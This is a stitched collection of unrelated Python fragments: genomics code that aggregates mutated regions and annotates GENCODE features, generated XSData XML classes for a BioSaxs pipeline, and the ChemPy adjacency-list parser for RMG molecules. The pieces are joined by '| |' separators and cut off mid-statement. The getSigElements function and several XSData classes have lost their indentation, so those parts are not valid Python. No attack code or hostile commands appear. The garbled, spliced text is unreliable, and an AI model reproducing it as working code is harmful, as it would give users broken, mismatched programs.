                    regions_genes_dict[region][i]+="::"+geneset
                    try:
                        if gene_name not in enriched_genesets_dict[geneset+gene_place_dist]:
                            enriched_genesets_dict[geneset+gene_place_dist].append(gene_name)
                    except KeyError:
                        enriched_genesets_dict[geneset+gene_place_dist] = [gene_name]
                    try:
                        if gene_name not in enriched_genesets_dict_overall[geneset]:
                            enriched_genesets_dict_overall[geneset].append(gene_name)
                    except KeyError:
                        enriched_genesets_dict_overall[geneset] = [gene_name]
    # Print per-category unique-gene counts (Python 2 print statements).
    print '\t'.join([r + ':' + str(len(genes_all[r])) for r in genes_all.keys()])
    print '\t'.join([r + ':' + str(len(genes_all_per_side[r])) for r in genes_all_per_side.keys()])
    print '\t'.join([r + ':' + str(len(enriched_genesets_dict_overall[r])) for r in enriched_genesets_dict_overall.keys()])
    print '\t'.join([r + ':' + str(len(enriched_genesets_dict[r])) for r in enriched_genesets_dict.keys()])
    return regions_genes_dict, genes_all, genes_all_per_side, enriched_genesets_dict_overall, enriched_genesets_dict
def write_aggregated_lines_to_outfile(aggregated_lines, cols_to_write,
                                      regions_genes_dict, summary_info_to_write, summary_dicts_to_write,
                                      region_types_dict,
                                      aggregated_output_file):
    """Write the aggregated region rows plus summary sections to a TSV file.

    aggregated_lines: list of row lists; l[3] is the region position ID used
        to look up nearby genes and overlapping feature types.
    cols_to_write: header names for the aggregated columns.
    regions_genes_dict: position ID -> list of nearby-gene strings.
    summary_info_to_write: section name -> {key: scalar} (values written as-is).
    summary_dicts_to_write: section name -> {key: list} (list lengths written).
    region_types_dict: position ID -> list of [feature_type, num_muts]
        (as produced by get_region_type).
    Returns aggregated_output_file.

    NOTE(review): each data row appends three extra columns (genes,
    feature_type, feature_types) while the header only adds 'Feature_types',
    so header and rows are offset by two columns -- confirm whether this is
    intended by downstream consumers before changing it.
    """
    with open(aggregated_output_file, 'w') as output_ofile:
        # Summary sections first: one line per dict, tab-separated
        # "key:value" pairs after the section name.
        output_ofile.write("Summary Info\n")
        for dict_name in sorted(summary_info_to_write.keys()):
            output_ofile.write(dict_name + '\t' + '\t'.join([r + ':' + str((summary_info_to_write[dict_name][r])) for r in summary_info_to_write[dict_name].keys()]) + '\n')
        for dict_name in sorted(summary_dicts_to_write.keys()):
            output_ofile.write(dict_name + '\t' + '\t'.join([r + ':' + str(len(summary_dicts_to_write[dict_name][r])) for r in summary_dicts_to_write[dict_name].keys()]) + '\n')
        # Header for the aggregated rows.
        output_ofile.write('\t'.join(cols_to_write) + '\t' + 'Feature_types'+'\n')
        for l in aggregated_lines:
            # Nearby genes for this region; "None" when the region ID is
            # absent from regions_genes_dict.
            genes = "None"
            try:
                genes = ','.join(regions_genes_dict[l[3]])
            except KeyError:
                pass
            # Pick the overlapping feature with the most mutations,
            # preferring any non-'gene' feature; a bare 'gene' hit is
            # reported as 'intronic', no hit at all as 'intergenic'.
            feature_type = 'intergenic'
            feature_types = ['intergenic']
            try:
                feature_to_select_index = 0
                n = 0
                feature_types = [x[0]+":"+str(x[1]) for x in region_types_dict[l[3]]]
                for i, feature in enumerate(region_types_dict[l[3]]):#find index of the feature that has the largest num of muts
                    if feature[0] != 'gene':
                        if feature[1]>n:
                            feature_to_select_index = i
                            n = feature[1]
                feature_type = region_types_dict[l[3]][feature_to_select_index][0]
                if feature_type=='gene':
                    feature_type = 'intronic'
            except KeyError:
                pass
            output_ofile.write('\t'.join([str(x) for x in l]) + '\t' + genes + '\t' + feature_type + '\t' + ','.join(feature_types)+'\n')
    return aggregated_output_file
def overlaps(ms, me, rs, re):
    """Return True if interval [ms, me] overlaps interval [rs, re].

    Intervals are inclusive at both ends. The three cases checked are:
    the first interval starts inside the second, ends inside the second,
    or fully contains it.
    """
    # Start of [ms, me] falls inside [rs, re].
    if rs <= ms <= re:
        return True
    # End of [ms, me] falls inside [rs, re].
    if rs <= me <= re:
        return True
    # [rs, re] is fully contained within [ms, me].
    return ms <= rs and me >= re
def get_region_type(aggregated_lines, genes_segments_input_file, gene_types_to_consider, gene_status_to_consider, feature_types_to_consider, muts_col_index=19):
    """For each aggregated region, collect the overlapping genomic feature
    types and count how many of the region's mutations fall in each feature.

    aggregated_lines: rows whose cols 0-3 are chr/start/end/positionID and
        whose column `muts_col_index` holds comma-separated mutation strings
        ("chr:start-end#..." per mutation).
    genes_segments_input_file: BED-like feature file; with the layout
        written by get_features_from_gencode, col 3 = feature type,
        col 8 = gene_type, col 9 = gene_status -- confirm if another
        producer is used.
    Returns: positionID -> list of [feature_type, num_muts_in_feature].

    Writes two temp files in the CWD (cleanup lines are commented out).
    """
    region_temp_file = 'aggregated_lines_temp_regions'
    # Dump chr/start/end/positionID plus the mutation list for bedtools.
    with open(region_temp_file, 'w') as ofile:
        for reg in aggregated_lines:
            ofile.write('\t'.join(reg[0:4]) + '\t' + reg[muts_col_index] + '\n')
    # wo=True keeps the full records of both files for every overlap.
    BedTool(genes_segments_input_file).intersect(BedTool(region_temp_file), wo=True).saveas(region_temp_file+'genesfeatures')
    region_types_dict = {}#store feature type and number of muts in the feature type
    with open(region_temp_file+'genesfeatures', 'r') as ifile:
        l = ifile.readline().strip().split('\t')
        while len(l)>3:
            # After intersect, cols 0-9 come from the feature file and cols
            # 10-14 from the region temp file written above, so l[13] is the
            # positionID and l[14] the mutation list.
            if l[8] in gene_types_to_consider and l[9] in gene_status_to_consider and l[3] in feature_types_to_consider:
                #check the number of muts that have start larger than the start of this feature
                #keep the feature that have the largest number of muts
                #for each positionID append its overlapping feature types
                num_muts_in_this_feature = 0
                for mut in l[14].split(','):
                    # Mutation position is encoded as "chr:start-end#...".
                    mut_start = int(mut.split('#')[0].split(':')[1].split('-')[0])
                    mut_end = int(mut.split('#')[0].split(':')[1].split('-')[1])
                    if overlaps(mut_start, mut_end, int(l[1]), int(l[2])):
                        #if mut_start>int(l[11]) or (mut_start<int(l[11]) and mut_end>int(l[11])):#the mut is within the region
                        num_muts_in_this_feature+=1
                #append feature type and the number of muts in it for each regionID
                try:
                    region_types_dict[l[13]].append([l[3], num_muts_in_this_feature])
                except KeyError:
                    region_types_dict[l[13]] = [[l[3], num_muts_in_this_feature]]
            l = ifile.readline().strip().split('\t')
    #os.remove(region_temp_file)
    #os.remove(region_temp_file+'genesfeatures')
    return region_types_dict
def get_features_from_gencode(gencode_input_file, gencode_output_file):
    """Convert a GENCODE GFF3-style annotation file into a BED-like file.

    Each output line has the columns:
    chr, start, end, feature_type, source, strand, ID,
    geneID::geneName, gene_type, gene_status.
    For every 'gene' feature an additional 'proximal_promoter' record is
    written covering the 2kb upstream of the transcription start
    (strand-aware), with coordinates clamped at 1.

    Lines missing expected attribute keys or with fewer than 9 columns are
    reported on stdout and skipped. Returns gencode_output_file.
    """
    with open(gencode_input_file, 'r') as ifile, open(gencode_output_file, 'w') as ofile:
        l = ifile.readline()
        while l:
            # Skip header/comment lines.
            if l.startswith('#'):
                print 'Skipping: ', l
                l = ifile.readline()
                continue
            sl = l.strip().split('\t')
            if len(sl)>8:
                # Parse the key=value attribute column (9th GFF column).
                info_dict = {}
                for info in sl[8].split(';'):
                    if '=' in info:
                        info_dict[info.split('=')[0]] = info.split('=')[1]
                #if info_dict['gene_status'] == 'KNOWN':
                try:
                    ol = [sl[0], sl[3], sl[4], sl[2], sl[1], sl[6], info_dict['ID'], info_dict['gene_id']+"::"+info_dict['gene_name'], info_dict['gene_type'], info_dict['gene_status']]
                    ofile.write('\t'.join(ol) + '\n')
                    #if it was a gene then write a promoter region to the file too
                    if sl[2]=='gene':
                        # 2kb upstream of the start for '+' strand genes...
                        promoter_start = int(sl[3])-2000
                        promoter_end = int(sl[3])-1
                        if sl[6]=='-':
                            # ...or 2kb beyond the end for '-' strand genes.
                            promoter_start = int(sl[4])+1
                            promoter_end = int(sl[4])+2000
                        # Clamp to chromosome coordinate 1.
                        if promoter_start<1:
                            promoter_start = 1
                        if promoter_end<1:
                            promoter_end = 1
                        ol = [sl[0], str(promoter_start), str(promoter_end), 'proximal_promoter', sl[1], sl[6], 'proximal_promoter:'+info_dict['ID'], info_dict['gene_id']+"::"+info_dict['gene_name'], info_dict['gene_type'], info_dict['gene_status']]
                        ofile.write('\t'.join(ol) + '\n')
                except KeyError:
                    # The attribute column lacked one of the expected keys.
                    print "Key not found: ", sl, info_dict
            else:
                print "Length<8: ", l, sl
            l = ifile.readline()
            if l=="":
                break
    return gencode_output_file
def getSigElements(generated_sig_merged_element_files, n, max_dist, window, output_dir):
upstream=True
downstream=True
overlapping = True
ext = ""
try:
ext = generated_sig_merged_element_files[0].split('/')[-1].split('.bed9')[1].replace('groupedbymutwithmotifinfo_','').replace('_statspvalues', '')
except IndexError:
print "error: ", generated_sig_merged_element_files
sys.exit()
aggregated_output_file = output_dir+'/combined{ext}_merged_intersectedmuts_grouped_aggregated{n}{up}{dw}maxdist{max_dist}kb_within{window}kb.tsv'.format(ext=ext, n=n, up="Up", dw="Dw", max_dist=max_dist/1000, window=window/1000)
if os.path.exists(aggregated_output_file):
return aggregated_output_file
print generated_sig_merged_element_files
annotated_motifs = 'mutations_files/obsann22May2017_exclVEP.bed9'
tracks_dir = 'datafiles/chromatin_marks_all_cells_onlynarrowpeaks'
observed_mutations_all = 'mutations_files/obsagr22May2017_exclVEP.bed9'#_notInExonsProteinCodingProcessedTranscriptIG.bed9'#'mutations_files/observedunique.bed9'
#regions_input_file = output_dir+'/combined_onlysig_merged_intersectedmuts_grouped_recurrent.col12'
combined_mut_grouped_file = output_dir+'/combined{ext}_merged_intersectedmuts_grouped_recurrent.col12'.format(ext=ext)
if not os.path.exists(combined_mut_grouped_file):
combined_file_all = combined_mut_grouped_file+'_temp'
with open(combined_file_all, 'w') as regions_input_ofile:
for cohort_sigregions_file in generated_sig_merged_element_files:
cohort_name = cohort_sigregions_file.split('/')[-1].split('_')[0]
with open(cohort_sigregions_file, 'r') as cohort_sigregions_ifile:
l = cohort_sigregions_ifile.readline().strip().split('\t')
while l and len(l)>10:
regions_input_ofile.write('\t'.join(l[0:3]) | |
= dmass
else:
strMessage = (
"ERROR! XSDataRamboTainer.setDmass argument is not XSDataDouble but %s"
% dmass.__class__.__name__
)
raise BaseException(strMessage)
def delDmass(self):
self._dmass = None
dmass = property(getDmass, setDmass, delDmass, "Property for dmass")
def export(self, outfile, level, name_="XSDataRamboTainer"):
showIndent(outfile, level)
outfile.write(unicode("<%s>\n" % name_))
self.exportChildren(outfile, level + 1, name_)
showIndent(outfile, level)
outfile.write(unicode("</%s>\n" % name_))
def exportChildren(self, outfile, level, name_="XSDataRamboTainer"):
XSData.exportChildren(self, outfile, level, name_)
if self._vc is not None:
self.vc.export(outfile, level, name_="vc")
if self._qr is not None:
self.qr.export(outfile, level, name_="qr")
if self._mass is not None:
self.mass.export(outfile, level, name_="mass")
if self._dvc is not None:
self.dvc.export(outfile, level, name_="dvc")
if self._dqr is not None:
self.dqr.export(outfile, level, name_="dqr")
if self._dmass is not None:
self.dmass.export(outfile, level, name_="dmass")
def build(self, node_):
for child_ in node_.childNodes:
nodeName_ = child_.nodeName.split(":")[-1]
self.buildChildren(child_, nodeName_)
def buildChildren(self, child_, nodeName_):
if child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "vc":
obj_ = XSDataDouble()
obj_.build(child_)
self.setVc(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "qr":
obj_ = XSDataDouble()
obj_.build(child_)
self.setQr(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "mass":
obj_ = XSDataDouble()
obj_.build(child_)
self.setMass(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "dvc":
obj_ = XSDataDouble()
obj_.build(child_)
self.setDvc(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "dqr":
obj_ = XSDataDouble()
obj_.build(child_)
self.setDqr(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "dmass":
obj_ = XSDataDouble()
obj_.build(child_)
self.setDmass(obj_)
XSData.buildChildren(self, child_, nodeName_)
# Method for marshalling an object
def marshal(self):
oStreamString = StringIO()
oStreamString.write(unicode('<?xml version="1.0" ?>\n'))
self.export(oStreamString, 0, name_="XSDataRamboTainer")
oStringXML = oStreamString.getvalue()
oStreamString.close()
return oStringXML
# Only to export the entire XML tree to a file stream on disk
def exportToFile(self, _outfileName):
outfile = open(_outfileName, "w")
outfile.write(unicode('<?xml version="1.0" ?>\n'))
self.export(outfile, 0, name_="XSDataRamboTainer")
outfile.close()
# Deprecated method, replaced by exportToFile
def outputFile(self, _outfileName):
print(
"WARNING: Method outputFile in class XSDataRamboTainer is deprecated, please use instead exportToFile!"
)
self.exportToFile(_outfileName)
# Method for making a copy in a new instance
def copy(self):
return XSDataRamboTainer.parseString(self.marshal())
# Static method for parsing a string
def parseString(_inString):
doc = minidom.parseString(_inString)
rootNode = doc.documentElement
rootObj = XSDataRamboTainer()
rootObj.build(rootNode)
# Check that all minOccurs are obeyed by marshalling the created object
oStreamString = StringIO()
rootObj.export(oStreamString, 0, name_="XSDataRamboTainer")
oStreamString.close()
return rootObj
parseString = staticmethod(parseString)
# Static method for parsing a file
def parseFile(_inFilePath):
doc = minidom.parse(_inFilePath)
rootNode = doc.documentElement
rootObj = XSDataRamboTainer()
rootObj.build(rootNode)
return rootObj
parseFile = staticmethod(parseFile)
# end class XSDataRamboTainer
class XSDataInputBioSaxsAsciiExportv1_0(XSDataInput):
    """Input model for the BioSaxs ascii-export plugin (v1.0).

    Holds an integrated image and curve plus optional sample and experiment
    setup descriptions. Follows the generated XSData pattern used by the
    other classes in this file (typed setters, XML export/build, marshal).
    Only the constructor error paths were changed; see BUGFIX comments.
    """

    def __init__(
        self,
        configuration=None,
        experimentSetup=None,
        sample=None,
        integratedCurve=None,
        integratedImage=None,
    ):
        XSDataInput.__init__(self, configuration)
        if integratedImage is None:
            self._integratedImage = None
        elif integratedImage.__class__.__name__ == "XSDataImage":
            self._integratedImage = integratedImage
        else:
            # BUGFIX: format the message with the constructor argument;
            # self._integratedImage is never assigned on this branch, so the
            # original raised AttributeError instead of the intended message.
            strMessage = (
                "ERROR! XSDataInputBioSaxsAsciiExportv1_0 constructor argument 'integratedImage' is not XSDataImage but %s"
                % integratedImage.__class__.__name__
            )
            raise BaseException(strMessage)
        if integratedCurve is None:
            self._integratedCurve = None
        elif integratedCurve.__class__.__name__ == "XSDataFile":
            self._integratedCurve = integratedCurve
        else:
            # BUGFIX: use the argument, not the unset attribute.
            strMessage = (
                "ERROR! XSDataInputBioSaxsAsciiExportv1_0 constructor argument 'integratedCurve' is not XSDataFile but %s"
                % integratedCurve.__class__.__name__
            )
            raise BaseException(strMessage)
        if sample is None:
            self._sample = None
        elif sample.__class__.__name__ == "XSDataBioSaxsSample":
            self._sample = sample
        else:
            # BUGFIX: use the argument, not the unset attribute.
            strMessage = (
                "ERROR! XSDataInputBioSaxsAsciiExportv1_0 constructor argument 'sample' is not XSDataBioSaxsSample but %s"
                % sample.__class__.__name__
            )
            raise BaseException(strMessage)
        if experimentSetup is None:
            self._experimentSetup = None
        elif experimentSetup.__class__.__name__ == "XSDataBioSaxsExperimentSetup":
            self._experimentSetup = experimentSetup
        else:
            # BUGFIX: use the argument, not the unset attribute.
            strMessage = (
                "ERROR! XSDataInputBioSaxsAsciiExportv1_0 constructor argument 'experimentSetup' is not XSDataBioSaxsExperimentSetup but %s"
                % experimentSetup.__class__.__name__
            )
            raise BaseException(strMessage)

    # Methods and properties for the 'integratedImage' attribute
    def getIntegratedImage(self):
        return self._integratedImage

    def setIntegratedImage(self, integratedImage):
        if integratedImage is None:
            self._integratedImage = None
        elif integratedImage.__class__.__name__ == "XSDataImage":
            self._integratedImage = integratedImage
        else:
            strMessage = (
                "ERROR! XSDataInputBioSaxsAsciiExportv1_0.setIntegratedImage argument is not XSDataImage but %s"
                % integratedImage.__class__.__name__
            )
            raise BaseException(strMessage)

    def delIntegratedImage(self):
        self._integratedImage = None

    integratedImage = property(
        getIntegratedImage,
        setIntegratedImage,
        delIntegratedImage,
        "Property for integratedImage",
    )

    # Methods and properties for the 'integratedCurve' attribute
    def getIntegratedCurve(self):
        return self._integratedCurve

    def setIntegratedCurve(self, integratedCurve):
        if integratedCurve is None:
            self._integratedCurve = None
        elif integratedCurve.__class__.__name__ == "XSDataFile":
            self._integratedCurve = integratedCurve
        else:
            strMessage = (
                "ERROR! XSDataInputBioSaxsAsciiExportv1_0.setIntegratedCurve argument is not XSDataFile but %s"
                % integratedCurve.__class__.__name__
            )
            raise BaseException(strMessage)

    def delIntegratedCurve(self):
        self._integratedCurve = None

    integratedCurve = property(
        getIntegratedCurve,
        setIntegratedCurve,
        delIntegratedCurve,
        "Property for integratedCurve",
    )

    # Methods and properties for the 'sample' attribute
    def getSample(self):
        return self._sample

    def setSample(self, sample):
        if sample is None:
            self._sample = None
        elif sample.__class__.__name__ == "XSDataBioSaxsSample":
            self._sample = sample
        else:
            strMessage = (
                "ERROR! XSDataInputBioSaxsAsciiExportv1_0.setSample argument is not XSDataBioSaxsSample but %s"
                % sample.__class__.__name__
            )
            raise BaseException(strMessage)

    def delSample(self):
        self._sample = None

    sample = property(getSample, setSample, delSample, "Property for sample")

    # Methods and properties for the 'experimentSetup' attribute
    def getExperimentSetup(self):
        return self._experimentSetup

    def setExperimentSetup(self, experimentSetup):
        if experimentSetup is None:
            self._experimentSetup = None
        elif experimentSetup.__class__.__name__ == "XSDataBioSaxsExperimentSetup":
            self._experimentSetup = experimentSetup
        else:
            strMessage = (
                "ERROR! XSDataInputBioSaxsAsciiExportv1_0.setExperimentSetup argument is not XSDataBioSaxsExperimentSetup but %s"
                % experimentSetup.__class__.__name__
            )
            raise BaseException(strMessage)

    def delExperimentSetup(self):
        self._experimentSetup = None

    experimentSetup = property(
        getExperimentSetup,
        setExperimentSetup,
        delExperimentSetup,
        "Property for experimentSetup",
    )

    def export(self, outfile, level, name_="XSDataInputBioSaxsAsciiExportv1_0"):
        # Write this object's XML element wrapping its children.
        showIndent(outfile, level)
        outfile.write(unicode("<%s>\n" % name_))
        self.exportChildren(outfile, level + 1, name_)
        showIndent(outfile, level)
        outfile.write(unicode("</%s>\n" % name_))

    def exportChildren(self, outfile, level, name_="XSDataInputBioSaxsAsciiExportv1_0"):
        XSDataInput.exportChildren(self, outfile, level, name_)
        # integratedImage and integratedCurve are warned about when absent;
        # sample and experimentSetup are optional.
        if self._integratedImage is not None:
            self.integratedImage.export(outfile, level, name_="integratedImage")
        else:
            warnEmptyAttribute("integratedImage", "XSDataImage")
        if self._integratedCurve is not None:
            self.integratedCurve.export(outfile, level, name_="integratedCurve")
        else:
            warnEmptyAttribute("integratedCurve", "XSDataFile")
        if self._sample is not None:
            self.sample.export(outfile, level, name_="sample")
        if self._experimentSetup is not None:
            self.experimentSetup.export(outfile, level, name_="experimentSetup")

    def build(self, node_):
        for child_ in node_.childNodes:
            nodeName_ = child_.nodeName.split(":")[-1]
            self.buildChildren(child_, nodeName_)

    def buildChildren(self, child_, nodeName_):
        if child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "integratedImage":
            obj_ = XSDataImage()
            obj_.build(child_)
            self.setIntegratedImage(obj_)
        elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "integratedCurve":
            obj_ = XSDataFile()
            obj_.build(child_)
            self.setIntegratedCurve(obj_)
        elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "sample":
            obj_ = XSDataBioSaxsSample()
            obj_.build(child_)
            self.setSample(obj_)
        elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "experimentSetup":
            obj_ = XSDataBioSaxsExperimentSetup()
            obj_.build(child_)
            self.setExperimentSetup(obj_)
        XSDataInput.buildChildren(self, child_, nodeName_)

    # Method for marshalling an object
    def marshal(self):
        oStreamString = StringIO()
        oStreamString.write(unicode('<?xml version="1.0" ?>\n'))
        self.export(oStreamString, 0, name_="XSDataInputBioSaxsAsciiExportv1_0")
        oStringXML = oStreamString.getvalue()
        oStreamString.close()
        return oStringXML

    # Only to export the entire XML tree to a file stream on disk
    def exportToFile(self, _outfileName):
        outfile = open(_outfileName, "w")
        outfile.write(unicode('<?xml version="1.0" ?>\n'))
        self.export(outfile, 0, name_="XSDataInputBioSaxsAsciiExportv1_0")
        outfile.close()

    # Deprecated method, replaced by exportToFile
    def outputFile(self, _outfileName):
        print(
            "WARNING: Method outputFile in class XSDataInputBioSaxsAsciiExportv1_0 is deprecated, please use instead exportToFile!"
        )
        self.exportToFile(_outfileName)

    # Method for making a copy in a new instance
    def copy(self):
        return XSDataInputBioSaxsAsciiExportv1_0.parseString(self.marshal())

    # Static method for parsing a string
    def parseString(_inString):
        doc = minidom.parseString(_inString)
        rootNode = doc.documentElement
        rootObj = XSDataInputBioSaxsAsciiExportv1_0()
        rootObj.build(rootNode)
        # Check that all minOccurs are obeyed by marshalling the created object
        oStreamString = StringIO()
        rootObj.export(oStreamString, 0, name_="XSDataInputBioSaxsAsciiExportv1_0")
        oStreamString.close()
        return rootObj

    parseString = staticmethod(parseString)

    # Static method for parsing a file
    def parseFile(_inFilePath):
        doc = minidom.parse(_inFilePath)
        rootNode = doc.documentElement
        rootObj = XSDataInputBioSaxsAsciiExportv1_0()
        rootObj.build(rootNode)
        return rootObj

    parseFile = staticmethod(parseFile)

# end class XSDataInputBioSaxsAsciiExportv1_0
class XSDataInputBioSaxsAzimutIntv1_0(XSDataInput):
def __init__(
self,
configuration=None,
experimentSetup=None,
sample=None,
correctedImage=None,
integratedCurve=None,
integratedImage=None,
normalizedImageSize=None,
normalizedImage=None,
):
XSDataInput.__init__(self, configuration)
if normalizedImage is None:
self._normalizedImage = None
elif normalizedImage.__class__.__name__ == "XSDataImage":
self._normalizedImage = normalizedImage
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'normalizedImage' is not XSDataImage but %s"
% self._normalizedImage.__class__.__name__
)
raise BaseException(strMessage)
if normalizedImageSize is None:
self._normalizedImageSize = None
elif normalizedImageSize.__class__.__name__ == "XSDataInteger":
self._normalizedImageSize = normalizedImageSize
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'normalizedImageSize' is not XSDataInteger but %s"
% self._normalizedImageSize.__class__.__name__
)
raise BaseException(strMessage)
if integratedImage is None:
self._integratedImage = None
elif integratedImage.__class__.__name__ == "XSDataImage":
self._integratedImage = integratedImage
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'integratedImage' is not XSDataImage but %s"
% self._integratedImage.__class__.__name__
)
raise BaseException(strMessage)
if integratedCurve is None:
self._integratedCurve = None
elif integratedCurve.__class__.__name__ == "XSDataFile":
self._integratedCurve = integratedCurve
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'integratedCurve' is not XSDataFile but %s"
% self._integratedCurve.__class__.__name__
)
raise BaseException(strMessage)
if correctedImage is None:
self._correctedImage = None
elif correctedImage.__class__.__name__ == "XSDataImage":
self._correctedImage = correctedImage
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'correctedImage' is not XSDataImage but %s"
% self._correctedImage.__class__.__name__
)
raise BaseException(strMessage)
if sample is None:
self._sample = None
elif sample.__class__.__name__ == "XSDataBioSaxsSample":
self._sample = sample
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'sample' is not XSDataBioSaxsSample but %s"
% self._sample.__class__.__name__
)
raise BaseException(strMessage)
if experimentSetup is None:
self._experimentSetup = None
elif experimentSetup.__class__.__name__ == "XSDataBioSaxsExperimentSetup":
self._experimentSetup = experimentSetup
else:
strMessage = (
"ERROR! | |
#!/usr/bin/env python
# encoding: utf-8
################################################################################
#
# ChemPy - A chemistry toolkit for Python
#
# Copyright (c) 2012 by <NAME> (<EMAIL>)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
################################################################################
"""
This module contains functionality for reading from and writing to the
adjacency list format used by Reaction Mechanism Generator (RMG).
"""
import re
from .molecule import Atom, Bond
from .group import GroupAtom, GroupBond
#import chempy.molecule.atomtype as atomtypes
################################################################################
class InvalidAdjacencyListError(Exception):
    """
    Raised when an RMG-style adjacency list cannot be parsed.

    Instantiate with a human-readable string explaining why the adjacency
    list is considered invalid.
    """
    pass
################################################################################
def fromAdjacencyList(adjlist, group=False):
    """
    Convert a string adjacency list `adjlist` into a set of :class:`Atom` and
    :class:`Bond` objects (or :class:`GroupAtom` and :class:`GroupBond`
    objects when `group` is True).

    Returns the list of atoms; bonds are attached to the atoms' ``edges``
    dictionaries. Raises :class:`InvalidAdjacencyListError` if the adjacency
    list cannot be parsed or is internally inconsistent.
    """
    atoms = []
    atomdict = {}
    bonds = {}
    try:
        adjlist = adjlist.strip()
        lines = adjlist.splitlines()
        if adjlist == '' or len(lines) == 0:
            raise InvalidAdjacencyListError('Empty adjacency list.')
        # Skip the first line if it contains a label
        if len(lines[0].split()) == 1:
            label = lines.pop(0)
            if len(lines) == 0:
                raise InvalidAdjacencyListError('No atoms specified in adjacency list.')
        # Raw string so '\s' is a regex whitespace class, not a string escape
        mistake1 = re.compile(r'\{[^}]*\s+[^}]*\}')
        # Iterate over the remaining lines, generating Atom or GroupAtom objects
        for line in lines:
            # Sometimes people put spaces after commas, which messes up the
            # parse-by-whitespace. Examples include '{Cd, Ct}'.
            if mistake1.search(line):
                raise InvalidAdjacencyListError(
                    "Shouldn't have spaces inside braces: {0}".format(mistake1.search(line).group())
                )
            # Sometimes commas are used to delimit bonds in the bond list,
            # so replace them just in case
            line = line.replace('},{', '} {')
            data = line.split()
            # Skip if blank line
            if len(data) == 0:
                continue
            # First item is index for atom
            # Sometimes these have a trailing period (as if in a numbered list),
            # so remove it just in case
            aid = int(data[0].strip('.'))
            # If second item starts with '*', then atom is labeled
            label = ''
            index = 1
            if data[1][0] == '*':
                label = data[1]
                index += 1
            # Next is the element or atom type
            # A list can be specified with the {,} syntax
            # (the original had this block duplicated; the first copy's result
            # was dead because it never advanced `index`)
            atomType = data[index]
            if atomType[0] == '{':
                atomType = atomType[1:-1].split(',')
            else:
                atomType = [atomType]
            index += 1
            # Next is the electron state
            radicalElectrons = []
            spinMultiplicity = []
            elecState = data[index].upper()
            if elecState[0] == '{':
                elecState = elecState[1:-1].split(',')
            else:
                elecState = [elecState]
            for e in elecState:
                if e == '0':
                    radicalElectrons.append(0); spinMultiplicity.append(1)
                elif e == '1':
                    radicalElectrons.append(1); spinMultiplicity.append(2)
                elif e == '2':
                    # Bare '2' is ambiguous: allow both singlet and triplet
                    radicalElectrons.append(2); spinMultiplicity.append(1)
                    radicalElectrons.append(2); spinMultiplicity.append(3)
                elif e == '2S':
                    radicalElectrons.append(2); spinMultiplicity.append(1)
                elif e == '2T':
                    radicalElectrons.append(2); spinMultiplicity.append(3)
                elif e == '3':
                    radicalElectrons.append(3); spinMultiplicity.append(4)
                elif e == '4':
                    radicalElectrons.append(4); spinMultiplicity.append(5)
            index += 1
            # Create a new atom based on the above information
            if group:
                atom = GroupAtom(atomType, radicalElectrons, spinMultiplicity, [0 for e in radicalElectrons], label)
            else:
                atom = Atom(atomType[0], radicalElectrons[0], spinMultiplicity[0], 0, label)
            # Add the atom to the list
            atoms.append(atom)
            atomdict[aid] = atom
            # Process list of bonds
            bonds[aid] = {}
            for datum in data[index:]:
                # Sometimes commas are used to delimit bonds in the bond list,
                # so strip them just in case
                datum = datum.strip(',')
                aid2, comma, order = datum[1:-1].partition(',')
                aid2 = int(aid2)
                if aid == aid2:
                    raise InvalidAdjacencyListError('Attempted to create a bond between atom {0:d} and itself.'.format(aid))
                if not order:
                    # Guard against '{2}' style bonds with no order; order[0]
                    # below would otherwise raise an opaque IndexError
                    raise InvalidAdjacencyListError('Missing bond order in bond "{0}" of atom {1:d}.'.format(datum, aid))
                if order[0] == '{':
                    order = order[1:-1].split(',')
                else:
                    order = [order]
                bonds[aid][aid2] = order
        # Check consistency using bonddict
        for atom1 in bonds:
            for atom2 in bonds[atom1]:
                if atom2 not in bonds:
                    raise InvalidAdjacencyListError('Atom {0:d} not in bond dictionary.'.format(atom2))
                elif atom1 not in bonds[atom2]:
                    raise InvalidAdjacencyListError('Found bond between {0:d} and {1:d}, but not the reverse.'.format(atom1, atom2))
                elif bonds[atom1][atom2] != bonds[atom2][atom1]:
                    raise InvalidAdjacencyListError('Found bonds between {0:d} and {1:d}, but of different orders "{2}" and "{3}".'.format(atom1, atom2, bonds[atom1][atom2], bonds[atom2][atom1]))
        # Convert bonddict to use Atom[group] and Bond[group] objects
        # sorted() works on Python 2 and 3; dict.keys().sort() fails on the
        # Python 3 view object
        for aid1 in sorted(atomdict.keys()):
